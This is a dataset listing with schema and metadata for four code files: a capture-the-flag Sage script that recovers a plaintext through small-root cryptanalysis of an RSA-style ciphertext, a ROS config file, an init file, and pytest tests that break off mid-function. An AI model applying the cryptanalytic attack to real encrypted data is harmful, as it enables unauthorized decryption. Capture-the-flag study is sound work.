Dataset schema (113 columns, listed in order; each entry is `column` (dtype)):

- Repository metadata: `hexsha` (string), `size` (int64), `ext` (string), `lang` (string), `max_stars_repo_path` (string), `max_stars_repo_name` (string), `max_stars_repo_head_hexsha` (string), `max_stars_repo_licenses` (list), `max_stars_count` (int64), `max_stars_repo_stars_event_min_datetime` (string), `max_stars_repo_stars_event_max_datetime` (string), `max_issues_repo_path` (string), `max_issues_repo_name` (string), `max_issues_repo_head_hexsha` (string), `max_issues_repo_licenses` (list), `max_issues_count` (int64), `max_issues_repo_issues_event_min_datetime` (string), `max_issues_repo_issues_event_max_datetime` (string), `max_forks_repo_path` (string), `max_forks_repo_name` (string), `max_forks_repo_head_hexsha` (string), `max_forks_repo_licenses` (list), `max_forks_count` (int64), `max_forks_repo_forks_event_min_datetime` (string), `max_forks_repo_forks_event_max_datetime` (string)
- File text and basic statistics: `content` (string), `avg_line_length` (float64), `max_line_length` (int64), `alphanum_fraction` (float64)
- Quality signals: `qsc_code_num_words_quality_signal`, `qsc_code_num_chars_quality_signal`, `qsc_code_mean_word_length_quality_signal`, `qsc_code_frac_words_unique_quality_signal`, `qsc_code_frac_chars_top_2grams_quality_signal`, `qsc_code_frac_chars_top_3grams_quality_signal`, `qsc_code_frac_chars_top_4grams_quality_signal`, `qsc_code_frac_chars_dupe_5grams_quality_signal`, `qsc_code_frac_chars_dupe_6grams_quality_signal`, `qsc_code_frac_chars_dupe_7grams_quality_signal`, `qsc_code_frac_chars_dupe_8grams_quality_signal`, `qsc_code_frac_chars_dupe_9grams_quality_signal`, `qsc_code_frac_chars_dupe_10grams_quality_signal`, `qsc_code_frac_chars_replacement_symbols_quality_signal`, `qsc_code_frac_chars_digital_quality_signal`, `qsc_code_frac_chars_whitespace_quality_signal`, `qsc_code_size_file_byte_quality_signal`, `qsc_code_num_lines_quality_signal`, `qsc_code_num_chars_line_max_quality_signal`, `qsc_code_num_chars_line_mean_quality_signal`, `qsc_code_frac_chars_alphabet_quality_signal`, `qsc_code_frac_chars_comments_quality_signal`, `qsc_code_cate_xml_start_quality_signal`, `qsc_code_frac_lines_dupe_lines_quality_signal`, `qsc_code_cate_autogen_quality_signal`, `qsc_code_frac_lines_long_string_quality_signal`, `qsc_code_frac_chars_string_length_quality_signal`, `qsc_code_frac_chars_long_word_length_quality_signal`, `qsc_code_frac_lines_string_concat_quality_signal`, `qsc_code_cate_encoded_data_quality_signal`, `qsc_code_frac_chars_hex_words_quality_signal`, `qsc_code_frac_lines_prompt_comments_quality_signal`, `qsc_code_frac_lines_assert_quality_signal`, `qsc_codepython_cate_ast_quality_signal`, `qsc_codepython_frac_lines_func_ratio_quality_signal`, `qsc_codepython_cate_var_zero_quality_signal`, `qsc_codepython_frac_lines_pass_quality_signal`, `qsc_codepython_frac_lines_import_quality_signal`, `qsc_codepython_frac_lines_simplefunc_quality_signal`, `qsc_codepython_score_lines_no_logic_quality_signal`, `qsc_codepython_frac_lines_print_quality_signal`. All are float64 except `qsc_code_num_words_quality_signal` (int64) and `qsc_codepython_cate_var_zero_quality_signal` (bool).
- Raw signal columns: the same 41 metrics without the `_quality_signal` suffix (`qsc_code_num_words` through `qsc_codepython_frac_lines_print`), all int64 except `qsc_code_frac_words_unique` (null) and `qsc_code_frac_lines_string_concat` (null).
- Other: `effective` (string), `hits` (int64)
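To make the column layout concrete, here is a minimal sketch of loading rows with this schema and filtering on a few of the quality-signal columns with pandas; the parquet file name and the thresholds are hypothetical and purely illustrative, not the ones used to build the dataset.

```python
import pandas as pd

# Hypothetical shard name; the real dataset may be split and named differently.
df = pd.read_parquet("data-00000-of-00001.parquet")

# Keep Python files that parse as an AST, are not marked autogenerated,
# and are not dominated by duplicated 10-grams (illustrative thresholds).
mask = (
    (df["lang"] == "Python")
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1)
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.5)
)
sample = df.loc[mask, ["max_stars_repo_name", "max_stars_repo_path", "size", "content"]]
print(sample.head())
```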
Row 1: `hexsha` b28be43846b5cc3d6814460abadf6f86dd8e6f93, `size` 12,247, `ext` py, `lang` Python
- max_stars: path `crypto/Irreducible/solve.sage.py`, repo `Enigmatrix/hats-ctf-2019`, head 0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192, licenses ["MIT"], count 5, events 2019-10-04T07:20:37.000Z to 2021-06-15T21:34:07.000Z
- max_issues: same path, repo, and head, licenses ["MIT"], count null, events null
- max_forks: same path, repo, and head, licenses ["MIT"], count null, events null
- `content`:
# This file was *autogenerated* from the file solve.sage
from sage.all_cmdline import * # import sage library
_sage_const_1 = Integer(1); _sage_const_0 = Integer(0); _sage_const_8 = Integer(8); _sage_const_0x100 = Integer(0x100); _sage_const_634390332758544863533225908175278820293902247273694738557279808547507605605243060845779162007453421166537998974798267403165147194326220277087481586732434578483984382044909938217885300325454854003592061285530227347443870161489884108156839152026792175883344824312705039432192788282221751953071400637582212565973825187901493157747810534534782538666139623239849108114074769483176190409077525619642607096659163938064917619080979276653346570460907840530820984090762890328670108372635266804760702260308210468824054785225609704744553702749030883759302514419732475353237265623064175672626973021817721830057157554469942016659636665088355223388001385492075532645512044699024856214047179824353294265985131421311264905683919868689468128201121500051333234294495133322269575003178917846613019513055294938676473347834648859092781820455177396655659241350758080943209448657069860156330266182595425071785597749584755392149850520201502359380960953028168070443739303437501159547492090284199748847031233395048565256094155871209024910665765470210489150199890408963339584734607161548145948117870587381417761820782604845894085527393326561552255285252183775565605213613851508658068982312542266745844181179298681513229587620814341358546533028653639404063795287 = Integer(634390332758544863533225908175278820293902247273694738557279808547507605605243060845779162007453421166537998974798267403165147194326220277087481586732434578483984382044909938217885300325454854003592061285530227347443870161489884108156839152026792175883344824312705039432192788282221751953071400637582212565973825187901493157747810534534782538666139623239849108114074769483176190409077525619642607096659163938064917619080979276653346570460907840530820984090762890328670108372635266804760702260308210468824054785225609704744553702749030883759302514419732475353237265623064175672626973021817721830057157554469942016659636665088355223388001385492075532645512044699024856214047179824353294265985131421311264905683919868689468128201121500051333234294495133322269575003178917846613019513055294938676473347834648859092781820455177396655659241350758080943209448657069860156330266182595425071785597749584755392149850520201502359380960953028168070443739303437501159547492090284199748847031233395048565256094155871209024910665765470210489150199890408963339584734607161548145948117870587381417761820782604845894085527393326561552255285252183775565605213613851508658068982312542266745844181179298681513229587620814341358546533028653639404063795287); 
_sage_const_340380243606881896055357150852081704009261841875676917168392901542600158697498147470022070926431538973355986319287899336229347984195186235609026994105880539538744385947844002522392600799291123746788307149592202054293542184751426393921386667054337702133605244653857105200184382184314615395089410386837949991463800365032817120047755695213056898358351029050988904465534196504370647057949656041980136093701111673261061362088910159060407069111138148213911184934346030355108818623873406179170643354109575921906069827319176721391148784597815966696725312993112836679580986301915869285153640258800257520387666039815335882682501846764931914005501272890703979399028303286591392295335090668894416007738581234420317705017602185505796952708538056986900927227219010924990687749054202059611121098007196600311153002496535400678852675523633611129751070279014895782742719230859241266618078080591783496208454660896116326742901368549176280950824427940866633550004165659591555809355785250595678271198087444 = Integer(340380243606881896055357150852081704009261841875676917168392901542600158697498147470022070926431538973355986319287899336229347984195186235609026994105880539538744385947844002522392600799291123746788307149592202054293542184751426393921386667054337702133605244653857105200184382184314615395089410386837949991463800365032817120047755695213056898358351029050988904465534196504370647057949656041980136093701111673261061362088910159060407069111138148213911184934346030355108818623873406179170643354109575921906069827319176721391148784597815966696725312993112836679580986301915869285153640258800257520387666039815335882682501846764931914005501272890703979399028303286591392295335090668894416007738581234420317705017602185505796952708538056986900927227219010924990687749054202059611121098007196600311153002496535400678852675523633611129751070279014895782742719230859241266618078080591783496208454660896116326742901368549176280950824427940866633550004165659591555809355785250595678271198087444); _sage_const_30 = Integer(30)
n = _sage_const_634390332758544863533225908175278820293902247273694738557279808547507605605243060845779162007453421166537998974798267403165147194326220277087481586732434578483984382044909938217885300325454854003592061285530227347443870161489884108156839152026792175883344824312705039432192788282221751953071400637582212565973825187901493157747810534534782538666139623239849108114074769483176190409077525619642607096659163938064917619080979276653346570460907840530820984090762890328670108372635266804760702260308210468824054785225609704744553702749030883759302514419732475353237265623064175672626973021817721830057157554469942016659636665088355223388001385492075532645512044699024856214047179824353294265985131421311264905683919868689468128201121500051333234294495133322269575003178917846613019513055294938676473347834648859092781820455177396655659241350758080943209448657069860156330266182595425071785597749584755392149850520201502359380960953028168070443739303437501159547492090284199748847031233395048565256094155871209024910665765470210489150199890408963339584734607161548145948117870587381417761820782604845894085527393326561552255285252183775565605213613851508658068982312542266745844181179298681513229587620814341358546533028653639404063795287
a = [2010531849014807811244967452550596954170482017366963197179967378341950609877035976926266565045201327954545531976193764010455839462214548125935809831930906217583985144556304000068160287029349520299624614834820614980577571769037952453503904780829945902428777023113240343971798255994725602060032080395165249252118203994597989803323008689445738726958316299382843046151379404223038378306103446946814242282508452762994709381767737020005234626341549245619459606877141219867068035139077696570326679785895561991386159948678734295510819110097778649467477026525304571866935401916133281154191128385628924010309987916939562860944L, 1957728714073561025444049862451037169274105569943303306791307265284902155776766730138921929047515116875064204422846355574659846986380481554081304450196740182791655899138238300809181952819798719334682652843468093290967739253183715122445807216087701696532328794077633906535348772595420658664669631932240904104526705654085471965081124710424408313188658654269997323823344665013620792807904922448804892707022585395887233208782695904651548515039238103159738011670910000843881190838705734405508263817080572349269917899711814025839567038759017324204719274094925235488251139390100879986034431576582233053100042459754056721328L, 14633594144788739927026894977043979066159638374614447093714156045032057824085101117749372536628815108406925045960292833889218109370315352739477423094983344593380872607721265115065643999704623781354837795392356213963728183408707784710730841593835763297179871187214115888599867994386663070192739880387913810433876985756438937656886777305157527713862265106976080853776807701851418468867892514187995330270398511480196219270778795626752449173027453951938908052889586748615014028198921819259360961682079672852871334097972121537195761276233238326097040304123395264448294169902168081701555285410252628418576329612032743822656L, 30929744237761925275779619637228756909273275228972750977833842275681869086116340969076439846499218017534226291524942385308707563078786626236494596208894970526069269519418649985914398929328741202595762382734225557440059310318524491309260192804536315362985304213401749160044798809875645571955587602983295393590560174552439433974878741218152614497192789702930801977104493818899157936635075060547744352678118768665244767760543756729845753210746035948226910923229144631648461693219879044167508144465542745778725708145285938143335905860453429086530916135708582690647044249742625720553034307280926958493635056715199618948255L, 2736997387699905351668085980997857573537883215020849824031924382478774724354893995582443335957215604292871013310245658357276267388909986882514451123356268477738475383061844694003338924573791710273211430026022500105647755368859353564374828513889089668535501312143014776864228173945699898966966038577097286471416334498369191331733489012787167892563032372216318024758127709506640721164446544052940686946306349794324428219841864315805616481940362854692253412646097863219862500643764207829111058334685461395519153197770408604824434255674531095991762385404626964401461278191533996440553437636464337965673618849007875748335L, 
10138853565592015105460349391824630041349301782955976098151452306601942132992939175760470023847252810478352651882007892229451212768112510921391523329570278170494870876172217466315580044877833446334271653752234487178668899095662633037386537755400120340774679512511394968940579253203708322989582269535699783805149252869744882348496667131258430507421739826457730921423784937910140043747774058768492858149057261161659337718982175323365787375263797780804084574556765866310528969548165524609215368165479974192219642551585795556561156118984108183820103401463673813278192939446726782671210175154550709092578352646292397148695L, 2705289074015868556495876116122034778419482000649816956762698090011178447945290332666191814319874892445968692874942151089591538419047230200250130537360543283500874358388021915731700617342644182770696524538105308332591350174568506946526824286428046901094088052777906597555877816895182575842954717583238668932627003103765051957703661539717838484368046549711819678603390137497777321547780661184734527888712946398571068227748473417068659665911823063293642880605380887346392751759275385749252422803713137333278390979373269487140753614904363290566511431042967664299521308911436294095767853420126884677960454179566849947911L, 32255664078313921987277419379096806499011603256554039416290254881793020312519926307527921519979634759557831587219841583766017314943677339008869153819229665461685884451017771930587031347299979562059056085002308162520099267712782084503108260647689403237182131017247206190667209194033633402951334606382904942572174996868542183284017683810713524436317515257997599861313148353141712577673062302740163653303306191436502370962209436722553506417051271738096885658139454947332529520834452755246989316977226513412490778345898961230442523579466541698292139280562767818413666760816022286886124820077034842996907566401674181684192L]
enc = _sage_const_340380243606881896055357150852081704009261841875676917168392901542600158697498147470022070926431538973355986319287899336229347984195186235609026994105880539538744385947844002522392600799291123746788307149592202054293542184751426393921386667054337702133605244653857105200184382184314615395089410386837949991463800365032817120047755695213056898358351029050988904465534196504370647057949656041980136093701111673261061362088910159060407069111138148213911184934346030355108818623873406179170643354109575921906069827319176721391148784597815966696725312993112836679580986301915869285153640258800257520387666039815335882682501846764931914005501272890703979399028303286591392295335090668894416007738581234420317705017602185505796952708538056986900927227219010924990687749054202059611121098007196600311153002496535400678852675523633611129751070279014895782742719230859241266618078080591783496208454660896116326742901368549176280950824427940866633550004165659591555809355785250595678271198087444
P = PolynomialRing(Zmod(n), implementation='NTL', names=('x',)); (x,) = P._first_ngens(1)
f = -enc
for i in range(_sage_const_8 ):
    f += a[i] * x**i
f /= a[-_sage_const_1 ]
print Integer(f.small_roots(X=_sage_const_0x100 **_sage_const_30 )[_sage_const_0 ]).hex().decode('hex')
- `avg_line_length` | `max_line_length` | `alphanum_fraction`: 720.411765 | 4,960 | 0.983588
- quality signals (`qsc_*_quality_signal`, in schema order): 119 | 12,247 | 100.840336 | 0.428571 | 0.0105 | 0.001667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.955559 | 0.007839 | 12,247 | 16 | 4,961 | 765.4375 | 0.032014 | 0.006042 | 0 | 0 | 1 | 0 | 0.000575 | 0 | 0 | 1 | 0.000411 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.090909
- raw signal columns (`qsc_*`, in schema order): 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- `effective`: 0 | `hits`: 8
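The fraction-style signals are defined over the raw `content` string. As a hedged sketch only (the exact tokenization and edge-case handling behind the published numbers is not specified here, so results may differ), metrics such as the unique-word fraction and the duplicated-10-gram character fraction could be approximated like this:

```python
from collections import Counter

def frac_words_unique(content: str) -> float:
    # Whitespace-split "words"; the published pipeline may tokenize differently.
    words = content.split()
    return len(set(words)) / len(words) if words else 0.0

def frac_chars_dupe_ngrams(content: str, n: int = 10) -> float:
    # Fraction of word-characters that fall inside a word n-gram occurring more
    # than once. Overlapping duplicates are counted per n-gram here, so this
    # rough version can overestimate relative to a de-duplicated count.
    words = content.split()
    if len(words) < n:
        return 0.0
    ngrams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(ngrams)
    dupe_chars = sum(sum(len(w) for w in gram) for gram in ngrams if counts[gram] > 1)
    total_chars = sum(len(w) for w in words)
    return dupe_chars / total_chars if total_chars else 0.0
```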
Row 2: `hexsha` b2941ee4f320aad7f403ab15068d28550accf5a9, `size` 10,621, `ext` py, `lang` Python
- max_stars: path `RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/costmap_converter/cfg/CostmapToDynamicObstaclesConfig.py`, repo `QianheYu/xtark_driver_dev`, head 1708888161cf20c0d1f45c99d0da4467d69c26c8, licenses ["BSD-3-Clause"], count 1, events 2022-03-11T03:31:15.000Z to 2022-03-11T03:31:15.000Z
- max_issues: same path and head, repo `bravetree/xtark_driver_dev`, licenses ["BSD-3-Clause"], count null, events null
- max_forks: same path and head, repo `bravetree/xtark_driver_dev`, licenses ["BSD-3-Clause"], count null, events null
- `content`:
## *********************************************************
##
## File autogenerated for the costmap_converter package
## by the dynamic_reconfigure package.
## Please do not edit.
##
## ********************************************************/
from dynamic_reconfigure.encoding import extract_params
inf = float('inf')
config_description = {'upper': 'DEFAULT', 'lower': 'groups', 'srcline': 245, 'name': 'Default', 'parent': 0, 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'cstate': 'true', 'parentname': 'Default', 'class': 'DEFAULT', 'field': 'default', 'state': True, 'parentclass': '', 'groups': [], 'parameters': [{'srcline': 290, 'description': 'Foreground detection: Learning rate of the slow filter', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'alpha_slow', 'edit_method': '', 'default': 0.3, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Foreground detection: Learning rate of the fast filter', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'alpha_fast', 'edit_method': '', 'default': 0.85, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Foreground detection: Weighting coefficient between a pixels value and the mean of its nearest neighbors', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'beta', 'edit_method': '', 'default': 0.85, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Foreground detection: Minimal difference between the fast and the slow filter to recognize a obstacle as dynamic', 'max': 255, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_sep_between_slow_and_fast_filter', 'edit_method': '', 'default': 80, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Foreground detection: Minimal value of the fast filter to recognize a obstacle as dynamic', 'max': 255, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_occupancy_probability', 'edit_method': '', 'default': 180, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Foreground detection: Maximal mean value of the nearest neighbors of a pixel in the slow filter', 'max': 255, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_occupancy_neighbors', 'edit_method': '', 'default': 80, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Foreground detection: Size of the structuring element for the closing operation', 'max': 10, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'morph_size', 'edit_method': '', 'default': 1, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Include static obstacles as single-point polygons', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'publish_static_obstacles', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal distance between centers of two 
blobs to be considered as seperate blobs', 'max': 300.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_distance_between_blobs', 'edit_method': '', 'default': 10.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on number of pixels', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_area', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal number of pixels a blob consists of', 'max': 300, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_area', 'edit_method': '', 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blob detection: Maximal number of pixels a blob consists of', 'max': 300, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_area', 'edit_method': '', 'default': 300, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on their circularity', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_circularity', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal circularity value (0 in case of a line)', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_circularity', 'edit_method': '', 'default': 0.2, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Maximal circularity value (1 in case of a circle)', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_circularity', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on their inertia ratio', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_inertia', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimal inertia ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_inertia_ratio', 'edit_method': '', 'default': 0.2, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Maximal inertia ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_inertia_ratio', 'edit_method': '', 'default': 1.0, 'level': 0, 
'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Filter blobs based on their convexity (Blob area / area of its convex hull)', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'filter_by_convexity', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Blob detection: Minimum convexity ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'min_convexity', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Blob detection: Maximal convexity ratio', 'max': 1.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_convexity', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Tracking: Time for one timestep of the kalman filter', 'max': 3.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'dt', 'edit_method': '', 'default': 0.2, 'level': 0, 'min': 0.1, 'type': 'double'}, {'srcline': 290, 'description': 'Tracking: Maximum distance between two points to be considered in the assignment problem', 'max': 150.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'dist_thresh', 'edit_method': '', 'default': 20.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Tracking: Maximum number of frames a object is tracked while it is not seen', 'max': 10, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_allowed_skipped_frames', 'edit_method': '', 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Tracking: Maximum number of Points in a objects trace', 'max': 100, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'max_trace_length', 'edit_method': '', 'default': 10, 'level': 0, 'min': 1, 'type': 'int'}], 'type': '', 'id': 0}
min = {}
max = {}
defaults = {}
level = {}
type = {}
all_level = 0
#def extract_params(config):
#    params = []
#    params.extend(config['parameters'])
#    for group in config['groups']:
#        params.extend(extract_params(group))
#    return params
for param in extract_params(config_description):
    min[param['name']] = param['min']
    max[param['name']] = param['max']
    defaults[param['name']] = param['default']
    level[param['name']] = param['level']
    type[param['name']] = param['type']
    all_level = all_level | param['level']
- `avg_line_length` | `max_line_length` | `alphanum_fraction`: 287.054054 | 9,740 | 0.687412
- quality signals (`qsc_*_quality_signal`, in schema order): 1,398 | 10,621 | 5.110157 | 0.12804 | 0.070549 | 0.047312 | 0.072788 | 0.755879 | 0.75238 | 0.74944 | 0.737682 | 0.737682 | 0.717945 | 0 | 0.029722 | 0.097166 | 10,621 | 36 | 9,741 | 295.027778 | 0.715299 | 0.037661 | 0 | 0 | 1 | 1.625 | 0.697617 | 0.257378 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0
- raw signal columns (`qsc_*`, in schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- `effective`: 0 | `hits`: 10
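Rows 1 and 2 both carry an explicit "autogenerated" marker in their file headers. A categorical flag like `qsc_code_cate_autogen` could plausibly be derived by scanning the first lines of `content` for such markers; the sketch below is a rough illustration under that assumption, not the dataset's actual detector.

```python
import re

AUTOGEN_PATTERN = re.compile(r"auto[- ]?generated|generated by|do not edit", re.IGNORECASE)

def looks_autogenerated(content: str, head_lines: int = 10) -> bool:
    # Check only the file header, where generators usually leave their marker.
    head = "\n".join(content.splitlines()[:head_lines])
    return bool(AUTOGEN_PATTERN.search(head))
```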
Row 3: `hexsha` a251d2ec0a2233b42481daef96e8fcd29f195be8, `size` 145, `ext` py, `lang` Python
- max_stars: path `src/credo_cf/classification/__init__.py`, repo `dzwiedziu-nkg/credo-classify-framework`, head 45417b505b4f4b20a7248f3487ca57a3fd49ccee, licenses ["MIT"], count null, events null
- max_issues: same path, repo, and head, licenses ["MIT"], count null, events null
- max_forks: same path, repo, and head, licenses ["MIT"], count 3, events 2020-06-19T15:41:19.000Z to 2020-06-29T12:47:05.000Z
- `content`:
from credo_cf.classification.artifact import *
from credo_cf.classification.preprocess import *
from credo_cf.classification.clustering import *
- `avg_line_length` | `max_line_length` | `alphanum_fraction`: 36.25 | 48 | 0.855172
- quality signals (`qsc_*_quality_signal`, in schema order): 18 | 145 | 6.722222 | 0.444444 | 0.223141 | 0.272727 | 0.619835 | 0.512397 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082759 | 145 | 3 | 49 | 48.333333 | 0.909774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
- raw signal columns (`qsc_*`, in schema order): 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
- `effective`: 0 | `hits`: 8
Row 4: `hexsha` a268adc5b8b7848ffb5e6631c348ba5eacc1ab13, `size` 2,403, `ext` py, `lang` Python
- max_stars: path `tests/unitary/RewardsOnlyGauge/test_approve.py`, repo `AqualisDAO/curve-dao-contracts`, head beec73a068da8ed01c0f710939dc5adb776d565b, licenses ["MIT"], count 217, events 2020-06-24T14:01:21.000Z to 2022-03-29T08:35:24.000Z
- max_issues: same path, repo, and head, licenses ["MIT"], count 25, events 2020-06-24T09:39:02.000Z to 2022-03-22T17:03:00.000Z
- max_forks: same path, repo, and head, licenses ["MIT"], count 110, events 2020-07-10T22:45:49.000Z to 2022-03-29T02:51:08.000Z
- `content`:
import pytest
@pytest.mark.parametrize("idx", range(5))
def test_initial_approval_is_zero(rewards_only_gauge, accounts, idx):
    assert rewards_only_gauge.allowance(accounts[0], accounts[idx]) == 0
def test_approve(rewards_only_gauge, accounts):
    rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 10 ** 19
def test_modify_approve(rewards_only_gauge, accounts):
